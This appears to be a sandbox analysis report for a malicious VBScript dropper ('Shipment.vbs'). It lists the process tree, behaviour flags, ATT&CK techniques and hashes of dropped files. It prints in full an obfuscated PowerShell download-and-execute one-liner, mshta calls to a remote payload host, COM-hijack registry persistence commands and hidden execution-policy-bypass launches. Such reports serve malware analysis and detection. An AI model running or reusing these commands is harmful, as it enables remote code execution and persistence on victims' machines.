- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3352

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa03c74f50,0x7ffa03c74f60,0x7ffa03c74f70
2⤵
PID:2112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1648,4229283288781748757,16682458742740593203,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1616 /prefetch:2
2⤵
PID:3872

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1648,4229283288781748757,16682458742740593203,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2016 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3764

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1648,4229283288781748757,16682458742740593203,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2316 /prefetch:8
2⤵
PID:4928

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,4229283288781748757,16682458742740593203,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3032 /prefetch:1
2⤵
PID:4840

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,4229283288781748757,16682458742740593203,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3040 /prefetch:1
2⤵
PID:4316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,4229283288781748757,16682458742740593203,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4320 /prefetch:8
2⤵
PID:3036

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,4229283288781748757,16682458742740593203,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4432 /prefetch:1
2⤵
PID:116

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1648,4229283288781748757,16682458742740593203,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5516 /prefetch:8
2⤵
PID:4308

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,4229283288781748757,16682458742740593203,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4892 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1496

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,4229283288781748757,16682458742740593203,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4880 /prefetch:8
2⤵
PID:5000

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1648,4229283288781748757,16682458742740593203,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5552 /prefetch:8
2⤵
PID:5088

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,4229283288781748757,16682458742740593203,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5500 /prefetch:8
2⤵
PID:4712

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,4229283288781748757,16682458742740593203,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
2⤵
PID:4632

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1648,4229283288781748757,16682458742740593203,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5788 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3268

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,4229283288781748757,16682458742740593203,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5856 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2416

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,4229283288781748757,16682458742740593203,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2464

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,4229283288781748757,16682458742740593203,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4444

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,4229283288781748757,16682458742740593203,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 /prefetch:8
2⤵
PID:4308

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,4229283288781748757,16682458742740593203,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5040 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4360

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1648,4229283288781748757,16682458742740593203,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2120 /prefetch:8
2⤵
PID:5044

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1648,4229283288781748757,16682458742740593203,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5800 /prefetch:8
2⤵
PID:720

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1648,4229283288781748757,16682458742740593203,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3560 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3392

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1648,4229283288781748757,16682458742740593203,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4468 /prefetch:8
2⤵
PID:1040

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4780

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "E:\Shipment.vbs"
1⤵
- Enumerates connected drives
PID:4852

C:\Windows\system32\Mshta.EXE
Mshta.EXE https://vigorous-wilson.91-212-52-180.plesk.page/Bypass.txt
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
PID:4736

C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
POWERSHELL $HYJXIHWDWOUCJQCVAEQPREE = '[417(/%(^2}\&8=64#+[$}]y417(/%(^2}\&8=64#+[$}]t14120$]9$#\}4_]4_^)03/*]_{^-!$+!&6%)%<0//4*=.IO.417(/%(^2}\&8=64#+[$}]t+333&&8<$@88<4(\56)-#&14120$]9$#\}4_]4_^)03/)$)&702!}^{3#\<8]@1$/&*]_{^-!$+!&6%)%<0//4*=+333&&8<$@88<4(\56)-#&14120$]9$#\}4_]4_^)03/)$)&702!}^{3#\<8]@1$/&d14120$]9$#\}4_]4_^)03/+333&&8<$@88<4(\56)-#&]'.Replace('417(/%(^2}\&8=64#+[$}]','S').Replace('14120$]9$#\}4_]4_^)03/','E').Replace('+333&&8<$@88<4(\56)-#&','R').Replace(')$)&702!}^{3#\<8]@1$/&','A').Replace('*]_{^-!$+!&6%)%<0//4*=','M');$HDVTITTDHVLAOZKFAYWYGIZ = ($HYJXIHWDWOUCJQCVAEQPREE -Join '')|&('I'+'EX');$HOGRJRLUDXJHRXVRUCKLZOL = '[$\+_/\99=<*3[=]${9<@}%y$\+_/\99=<*3[=]${9<@}%)#{=4]6_57]<@%7(5@7_^=&8%!{]23%[<[$-4}}$6#(*m.N&8%!{]23%[<[$-4}}$6#(*)#{=4]6_57]<@%7(5@7_^=.W&8%!{]23%[<[$-4}}$6#(*bR&8%!{]23%[<[$-4}}$6#(*qu&8%!{]23%[<[$-4}}$6#(*$\+_/\99=<*3[=]${9<@}%)#{=4]6_57]<@%7(5@7_^=]'.Replace('$\+_/\99=<*3[=]${9<@}%','S').Replace('&8%!{]23%[<[$-4}}$6#(*','E').Replace(')#{=4]6_57]<@%7(5@7_^=','T');$HADWKEPXOVJZCGGRDQYUUGY = ($HOGRJRLUDXJHRXVRUCKLZOL -Join '')|&('I'+'EX');$HZDFSFNTATJKVCKKSIVCJFW = '8}=7#08+1^7<+_31_7{157r4@!4!/=@_#43/<7/&*\\{_a[_\6<8}*$+]2=![0/9/_}}4@!4!/=@_#43/<7/&*\\{_'.Replace('8}=7#08+1^7<+_31_7{157','C').Replace('4@!4!/=@_#43/<7/&*\\{_','E').Replace('[_\6<8}*$+]2=![0/9/_}}','T');$HOBIHETKTJECHCLXLAXRTII = '[)+3}=+748#%&_66/^*4<$6\9[37))/5}1{0^\$4[8*)tR6\9[37))/5}1{0^\$4[8*)_8{75-!%3+}$$-}/)%*%98pon_8{75-!%3+}$$-}/)%*%986\9[37))/5}1{0^\$4[8*)'.Replace('[)+3}=+748#%&_66/^*4<$','G').Replace('6\9[37))/5}1{0^\$4[8*)','E').Replace('_8{75-!%3+}$$-}/)%*%98','S');$HLSASYIVOLWFAOSPWVQINNO = 'G6@[=4^%#_4@#)9!839#)%3t*\^{]=@+5{6&!%2//*<[3-6@[=4^%#_4@#)9!839#)%3)^[]+22%8-[&912]3[0^34pon)^[]+22%8-[&912]3[0^346@[=4^%#_4@#)9!839#)%3)^[]+22%8-[&912]3[0^34t*\^{]=@+5{6&!%2//*<[3-6@[=4^%#_4@#)9!839#)%3am'.Replace(')^[]+22%8-[&912]3[0^34','S').Replace('6@[=4^%#_4@#)9!839#)%3','E').Replace('*\^{]=@+5{6&!%2//*<[3-','R');$HWIGQVVTQPLAQJFXPNRIRSZ = '6[#-*[{14$_4}/8!(-2//*84/[74!}_)1}=)@45&\4_=a[7_4=)<7}4{()0}=)_+9{2To84/[74!}_)1}=)@45&\4_=n[7_4=)<7}4{()0}=)_+9{2'.Replace('6[#-*[{14$_4}/8!(-2//*','R').Replace('84/[74!}_)1}=)@45&\4_=','E').Replace('[7_4=)<7}4{()0}=)_+9{2','D');&('I'+'EX')($HDVTITTDHVLAOZKFAYWYGIZ::new($HADWKEPXOVJZCGGRDQYUUGY::$HZDFSFNTATJKVCKKSIVCJFW('https://vigorous-wilson.91-212-52-180.plesk.page/Server.txt').$HOBIHETKTJECHCLXLAXRTII().$HLSASYIVOLWFAOSPWVQINNO()).$HWIGQVVTQPLAQJFXPNRIRSZ())
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\CPNRAIJSTQDXNQXSQNQDSU\CPNRAIJSTQDXNQXSQNQDSU.ps1'"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3984

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\CPNRAIJSTQDXNQXSQNQDSU\CPNRAIJSTQDXNQXSQNQDSU.vbs"
3⤵
PID:2416

C:\Windows\System32\CScript.exe
"C:\Windows\System32\CScript.exe" "E:\Shipment.vbs"
1⤵
- Enumerates connected drives
PID:2808

C:\Windows\system32\Mshta.EXE
Mshta.EXE https://vigorous-wilson.91-212-52-180.plesk.page/Bypass.txt
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
PID:3960

C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
POWERSHELL $HYJXIHWDWOUCJQCVAEQPREE = '[417(/%(^2}\&8=64#+[$}]y417(/%(^2}\&8=64#+[$}]t14120$]9$#\}4_]4_^)03/*]_{^-!$+!&6%)%<0//4*=.IO.417(/%(^2}\&8=64#+[$}]t+333&&8<$@88<4(\56)-#&14120$]9$#\}4_]4_^)03/)$)&702!}^{3#\<8]@1$/&*]_{^-!$+!&6%)%<0//4*=+333&&8<$@88<4(\56)-#&14120$]9$#\}4_]4_^)03/)$)&702!}^{3#\<8]@1$/&d14120$]9$#\}4_]4_^)03/+333&&8<$@88<4(\56)-#&]'.Replace('417(/%(^2}\&8=64#+[$}]','S').Replace('14120$]9$#\}4_]4_^)03/','E').Replace('+333&&8<$@88<4(\56)-#&','R').Replace(')$)&702!}^{3#\<8]@1$/&','A').Replace('*]_{^-!$+!&6%)%<0//4*=','M');$HDVTITTDHVLAOZKFAYWYGIZ = ($HYJXIHWDWOUCJQCVAEQPREE -Join '')|&('I'+'EX');$HOGRJRLUDXJHRXVRUCKLZOL = '[$\+_/\99=<*3[=]${9<@}%y$\+_/\99=<*3[=]${9<@}%)#{=4]6_57]<@%7(5@7_^=&8%!{]23%[<[$-4}}$6#(*m.N&8%!{]23%[<[$-4}}$6#(*)#{=4]6_57]<@%7(5@7_^=.W&8%!{]23%[<[$-4}}$6#(*bR&8%!{]23%[<[$-4}}$6#(*qu&8%!{]23%[<[$-4}}$6#(*$\+_/\99=<*3[=]${9<@}%)#{=4]6_57]<@%7(5@7_^=]'.Replace('$\+_/\99=<*3[=]${9<@}%','S').Replace('&8%!{]23%[<[$-4}}$6#(*','E').Replace(')#{=4]6_57]<@%7(5@7_^=','T');$HADWKEPXOVJZCGGRDQYUUGY = ($HOGRJRLUDXJHRXVRUCKLZOL -Join '')|&('I'+'EX');$HZDFSFNTATJKVCKKSIVCJFW = '8}=7#08+1^7<+_31_7{157r4@!4!/=@_#43/<7/&*\\{_a[_\6<8}*$+]2=![0/9/_}}4@!4!/=@_#43/<7/&*\\{_'.Replace('8}=7#08+1^7<+_31_7{157','C').Replace('4@!4!/=@_#43/<7/&*\\{_','E').Replace('[_\6<8}*$+]2=![0/9/_}}','T');$HOBIHETKTJECHCLXLAXRTII = '[)+3}=+748#%&_66/^*4<$6\9[37))/5}1{0^\$4[8*)tR6\9[37))/5}1{0^\$4[8*)_8{75-!%3+}$$-}/)%*%98pon_8{75-!%3+}$$-}/)%*%986\9[37))/5}1{0^\$4[8*)'.Replace('[)+3}=+748#%&_66/^*4<$','G').Replace('6\9[37))/5}1{0^\$4[8*)','E').Replace('_8{75-!%3+}$$-}/)%*%98','S');$HLSASYIVOLWFAOSPWVQINNO = 'G6@[=4^%#_4@#)9!839#)%3t*\^{]=@+5{6&!%2//*<[3-6@[=4^%#_4@#)9!839#)%3)^[]+22%8-[&912]3[0^34pon)^[]+22%8-[&912]3[0^346@[=4^%#_4@#)9!839#)%3)^[]+22%8-[&912]3[0^34t*\^{]=@+5{6&!%2//*<[3-6@[=4^%#_4@#)9!839#)%3am'.Replace(')^[]+22%8-[&912]3[0^34','S').Replace('6@[=4^%#_4@#)9!839#)%3','E').Replace('*\^{]=@+5{6&!%2//*<[3-','R');$HWIGQVVTQPLAQJFXPNRIRSZ = '6[#-*[{14$_4}/8!(-2//*84/[74!}_)1}=)@45&\4_=a[7_4=)<7}4{()0}=)_+9{2To84/[74!}_)1}=)@45&\4_=n[7_4=)<7}4{()0}=)_+9{2'.Replace('6[#-*[{14$_4}/8!(-2//*','R').Replace('84/[74!}_)1}=)@45&\4_=','E').Replace('[7_4=)<7}4{()0}=)_+9{2','D');&('I'+'EX')($HDVTITTDHVLAOZKFAYWYGIZ::new($HADWKEPXOVJZCGGRDQYUUGY::$HZDFSFNTATJKVCKKSIVCJFW('https://vigorous-wilson.91-212-52-180.plesk.page/Server.txt').$HOBIHETKTJECHCLXLAXRTII().$HLSASYIVOLWFAOSPWVQINNO()).$HWIGQVVTQPLAQJFXPNRIRSZ())
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\CPNRAIJSTQDXNQXSQNQDSU\CPNRAIJSTQDXNQXSQNQDSU.ps1'"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1668

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\CPNRAIJSTQDXNQXSQNQDSU\CPNRAIJSTQDXNQXSQNQDSU.vbs"
3⤵
PID:3568

C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
POWERSHELL -noProfilE -ExEcutionPolicy Bypass -Command C:\ProgramData\CPNRAIJSTQDXNQXSQNQDSU\CPNRAIJSTQDXNQXSQNQDSU.bat
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\CPNRAIJSTQDXNQXSQNQDSU\CPNRAIJSTQDXNQXSQNQDSU.bat""
2⤵
PID:1976

C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
3⤵
- Modifies registry class
- Modifies registry key
PID:2820

C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
PID:4916

C:\Windows\system32\cmd.exe
cMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\CPNRAIJSTQDXNQXSQNQDSU\KKTVJRXYHBIYOERSNNCVOH.ps1'"
3⤵
PID:1612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\CPNRAIJSTQDXNQXSQNQDSU\KKTVJRXYHBIYOERSNNCVOH.ps1'"
4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4136

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
5⤵
PID:4760

C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
POWERSHELL -noProfilE -ExEcutionPolicy Bypass -Command C:\ProgramData\CPNRAIJSTQDXNQXSQNQDSU\CPNRAIJSTQDXNQXSQNQDSU.bat
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
PID:4576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\CPNRAIJSTQDXNQXSQNQDSU\CPNRAIJSTQDXNQXSQNQDSU.bat""
2⤵
PID:1140

C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
3⤵
- Modifies registry class
- Modifies registry key
PID:4180

C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
PID:3428

C:\Windows\system32\cmd.exe
cMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\CPNRAIJSTQDXNQXSQNQDSU\KKTVJRXYHBIYOERSNNCVOH.ps1'"
3⤵
PID:3212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\CPNRAIJSTQDXNQXSQNQDSU\KKTVJRXYHBIYOERSNNCVOH.ps1'"
4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2272

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
5⤵
PID:2164

C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" E:\Shipment.vbs
1⤵
- Enumerates connected drives
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4656

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\CPNRAIJSTQDXNQXSQNQDSU\CPNRAIJSTQDXNQXSQNQDSU.bat
Filesize
706B

MD5
83831d61270b08899fe13fca76350e70

SHA1
189889e8f75c5d7b8add6710e1f085291bde37a5

SHA256
9d701d4451ea7159508667cc49d257402f3884a6ca9b82f90e255bc412b20c9d

SHA512
b430c168a1439633a3461f72256586ce80aee98aea169715758f2f0fc29128bc91bdb54b6da939f8d89cae1d4f2ec42a592635994cce475db7dd8df68828c07f

Download Submit
C:\ProgramData\CPNRAIJSTQDXNQXSQNQDSU\CPNRAIJSTQDXNQXSQNQDSU.bat
Filesize
706B

MD5
83831d61270b08899fe13fca76350e70

SHA1
189889e8f75c5d7b8add6710e1f085291bde37a5

SHA256
9d701d4451ea7159508667cc49d257402f3884a6ca9b82f90e255bc412b20c9d

SHA512
b430c168a1439633a3461f72256586ce80aee98aea169715758f2f0fc29128bc91bdb54b6da939f8d89cae1d4f2ec42a592635994cce475db7dd8df68828c07f

Download Submit
C:\ProgramData\CPNRAIJSTQDXNQXSQNQDSU\CPNRAIJSTQDXNQXSQNQDSU.ps1
Filesize
3KB

MD5
4de8228c61dfbb32e4720f66aa30d42d

SHA1
b3101f1ecdd38bb4861e9b357ff3b737a21552a2

SHA256
d5aad6949398008b6589ac79d5090de2e69271b0df53596ddd15ce39284dbccb

SHA512
0c7d3d0da9ad287d8e1903740b10592e814ec3a909631dfaa69ad7ac8055e13f984ecfe877c79c7b9f975f36c4bf6a21a1c534f57053c4de72cab3baa1ed292b

Download Submit
C:\ProgramData\CPNRAIJSTQDXNQXSQNQDSU\CPNRAIJSTQDXNQXSQNQDSU.ps1
Filesize
3KB

MD5
4de8228c61dfbb32e4720f66aa30d42d

SHA1
b3101f1ecdd38bb4861e9b357ff3b737a21552a2

SHA256
d5aad6949398008b6589ac79d5090de2e69271b0df53596ddd15ce39284dbccb

SHA512
0c7d3d0da9ad287d8e1903740b10592e814ec3a909631dfaa69ad7ac8055e13f984ecfe877c79c7b9f975f36c4bf6a21a1c534f57053c4de72cab3baa1ed292b

Download Submit
C:\ProgramData\CPNRAIJSTQDXNQXSQNQDSU\CPNRAIJSTQDXNQXSQNQDSU.vbs
Filesize
2KB

MD5
4fc6c06dab80c1deca9cf53f8ab9e380

SHA1
fa91c0026d87753d5b7619097f83d396acdf5c03

SHA256
692c43787bc9e414df0ea9c7f19e61c8d8fc84c3cd4b44fa6f4636ea13da3bd7

SHA512
be23e4ac9b89978fd6b4f9d0b83e4a287661214901866828ce52537126699c095e9c92fbcb6949ca078a3612dc3bad44d44559d0a2f0a4c03bb2874d9aa6855e

Download Submit
C:\ProgramData\CPNRAIJSTQDXNQXSQNQDSU\CPNRAIJSTQDXNQXSQNQDSU.vbs
Filesize
2KB

MD5
4fc6c06dab80c1deca9cf53f8ab9e380

SHA1
fa91c0026d87753d5b7619097f83d396acdf5c03

SHA256
692c43787bc9e414df0ea9c7f19e61c8d8fc84c3cd4b44fa6f4636ea13da3bd7

SHA512
be23e4ac9b89978fd6b4f9d0b83e4a287661214901866828ce52537126699c095e9c92fbcb6949ca078a3612dc3bad44d44559d0a2f0a4c03bb2874d9aa6855e

Download Submit
C:\ProgramData\CPNRAIJSTQDXNQXSQNQDSU\KKTVJRXYHBIYOERSNNCVOH.ps1
Filesize
220KB

MD5
09bf0ee0ba78038d4524878be0b6ffbe

SHA1
7314c1700a55f62414b74d09dca6b0ea076ac908

SHA256
e5099dfd555a7dbba17eaee90a820c65519bb7204b349741c859d69921ec126e

SHA512
07f4c79d5c05c7a80b7a1426df084d6386ff91eab010c6445291a42de9789079bc6e36cf3438daed87592d04142498d7788aa21d19cf2f86a0320d9c4fcef62d

Download Submit
C:\ProgramData\CPNRAIJSTQDXNQXSQNQDSU\KKTVJRXYHBIYOERSNNCVOH.ps1
Filesize
220KB

MD5
09bf0ee0ba78038d4524878be0b6ffbe

SHA1
7314c1700a55f62414b74d09dca6b0ea076ac908

SHA256
e5099dfd555a7dbba17eaee90a820c65519bb7204b349741c859d69921ec126e

SHA512
07f4c79d5c05c7a80b7a1426df084d6386ff91eab010c6445291a42de9789079bc6e36cf3438daed87592d04142498d7788aa21d19cf2f86a0320d9c4fcef62d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.log
Filesize
3KB

MD5
00e7da020005370a518c26d5deb40691

SHA1
389b34fdb01997f1de74a5a2be0ff656280c0432

SHA256
a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe

SHA512
9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf

Download Submit
